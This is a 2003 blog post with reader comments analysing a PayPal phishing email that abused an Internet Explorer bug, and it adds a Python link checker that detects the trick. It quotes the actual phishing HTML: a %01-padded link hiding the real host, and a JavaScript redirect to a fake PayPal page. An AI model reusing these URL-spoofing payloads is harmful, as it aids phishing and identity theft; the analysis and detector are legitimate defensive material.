The security vulnerability in Internet Explorer that was published a few weeks ago has been exploited. Not only that, it's been done almost exactly as I commented (envisioned?) here on Sam Ruby's blog, only using spam instead of a weblog entry.
This is the spam email I received:
Viewing the html-source revealed that the "click here" link does not actually go to paypal, but is really the following html:
<a href="http://www.paypal.com%01%01%01%01%01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01@pp.youlikeshe.com ">click here</a>
The %01's here don't actually exploit the security vulnerability, but merely create enough filler to ensure the real url does not show on the status-bar. The page on youlikeshe.com contains the javascript that exploits the IE bug:
<script language="JavaScript">
location.href=unescape('http://www.paypal.com%01@www.epack.ch/p/verify.htm ');
</script>
which redirects the user's browser to http://www.paypal.com*@www.epack.ch/p/verify.htm, where "*" is a char(1). This page not only looks just like paypal, it also shows http://www.paypal.com in the address bar, because the bug in IE hides everything after the char(1).
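As an added illustration (not code from the original post), here is the kind of check a mail filter could apply to links like the two quoted above: it percent-decodes each href the way the page's unescape() call would, separates the text before the '@' (what IE displayed) from the host that is really contacted, and flags links where the two differ or where the userinfo part carries control characters. The sample hrefs are constructed after the ones in the spam, with the padding run shortened.

```python
from urllib.parse import urlsplit, unquote

# Constructed sample hrefs modelled on the spam quoted above (not the
# real mail); the %01 padding run is shortened to a few groups.
PAD = "%01%01%01%01 " * 3 + "%01"
SAMPLE_LINKS = [
    "http://www.paypal.com" + PAD + "@pp.youlikeshe.com ",
    "http://www.paypal.com%01@www.epack.ch/p/verify.htm ",
    "https://www.paypal.com/cgi-bin/webscr",
    "http://alice:secret@example.org/login",
]


def analyze_link(href):
    """Return (real_host, apparent_host, reasons) for one href.

    The URL is percent-decoded first, so '%01' becomes a real char(1),
    which is what IE saw after the page's unescape() call.
    """
    parts = urlsplit(unquote(href.strip()))
    userinfo, _, real_host = parts.netloc.rpartition("@")
    real_host = real_host.split(":")[0].lower()      # drop any port
    reasons = []
    if not userinfo:
        return real_host, real_host, reasons
    # What IE's address bar showed: the text before '@' with the
    # non-printable filler and spaces stripped out.
    shown = userinfo.split(":")[0]
    apparent_host = "".join(
        c for c in shown if c.isprintable() and not c.isspace()).lower()
    if any(ord(c) < 0x20 for c in userinfo):
        reasons.append("control characters in userinfo (hides real host in IE)")
    if "." in apparent_host and apparent_host != real_host:
        reasons.append(f"shown host {apparent_host} != real host {real_host}")
    return real_host, apparent_host, reasons


def suspicious_links(hrefs):
    """Map each href that triggered at least one reason to its reasons."""
    return {h: analyze_link(h)[2] for h in hrefs if analyze_link(h)[2]}


if __name__ == "__main__":
    for href, why in suspicious_links(SAMPLE_LINKS).items():
        print(repr(href.strip()[:40]), "->", "; ".join(why))
```

Plain credential-style userinfo without a dotted name (the fourth sample) is deliberately not flagged, so the check targets the look-alike pattern rather than every URL with an '@'.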
I'm sure a lot of paypal users fell for this and submitted their name, address, credit card info, social security number, etc. to some ruthless crook who can not only rob them using their credit card, but worse, steal their identity using all the other information that was entered.
I forwarded the spoof email in question to paypal and hope they will be able to catch these people and prosecute them to the maximum extent of the law...
Update: replaced some characters in the JavaScript-snippet with html entities because some overeager virus scanners were under the mistaken impression that this blog-entry exploited the security vulnerability itself. Hopefully they won't think so anymore now...
This exploit has been around awhile. I got this very same email back in June of this year.
I notified PayPal and my ISP but nothing happened. I didn't even get a return email from either one. I just checked the PayPal website and they have a warning but you have to follow a link to get there. I would think this is important enough to put on the home page but I guess not.
- Gene
Posted by Gene at December 28, 2003 1:22 AM
Yes, paypal spoofs are nothing new, but you used to be able to recognise them because the url in the address-bar would not say paypal.com - now it does (for IE users anyway).
Posted by Luke Hutteman at December 28, 2003 1:30 AM
I just submitted (to my ISP, the ISP of the sender, and the ISP - in China - of the site that the E-Mail click would end up sending you to) a very similar e-mail that my wife got from Earthlink the other day. The next day (Christmas) my daughter got the same E-Mail as my wife. The only thing that tipped my wife to ask me about it was that she got the E-Mail, not me as the primary owner of the account - though she pays the bill.
Posted by David at December 28, 2003 3:05 AM
DO NOT FALL FOR THIS!!!!
PLEASE DO NOT FALL FOR THIS SCAM! Please click here to read all about this PayPal scam caused by an IE bug. Thanks go out to Hutteman.com for this gem...
Actually I think the host for http://www.epack.ch/p/ has already taken the site down and it now redirects to the real PayPal.
Since I use a recent build of Mozilla Thunderbird, I was already aware of this, since it removes the URL padding. The URL in the status bar was 'http://www.paypal.com@pp.youlikeshe.com/'.
Posted by Neil T. at December 28, 2003 3:48 AM
This only works in Outlook Express and Internet Explorer, as far as I know. I tested it a few weeks ago and it didn't work in Outlook or Thunderbird, just Outlook Express.
Posted by Shannon J Hager at December 28, 2003 4:09 AM
The Internet explorer security bug everyone should know about
Your blog is causing my rss reader (with IE viewer) and my virus scanner to bug out because apparently it's detecting this spoof in your e-mails. See if you can fix the problem in your blog entry.
Greg
Posted by Greg S. at December 28, 2003 6:19 PM
IE Phishing
Like just about everybody else, I've received plenty of phishing attempts in my email. Most of them are for eBay or PayPal, though Visa is on the rise as well. The latest IE vulnerability is already playing into the phishers' hands. Luke Hutteman has a pr
Microsoft site? I hacked it. (Or maybe not...)
My own scam (my _god_ I'm lame :P)
Warning: PayPal Scams and other Bank Scams
Every other day or so, I receive an e-mail from someone claiming to be PayPal or another bank of some variety. Of course, each e-mail wants me to immediately click on the link and enter my username and password to...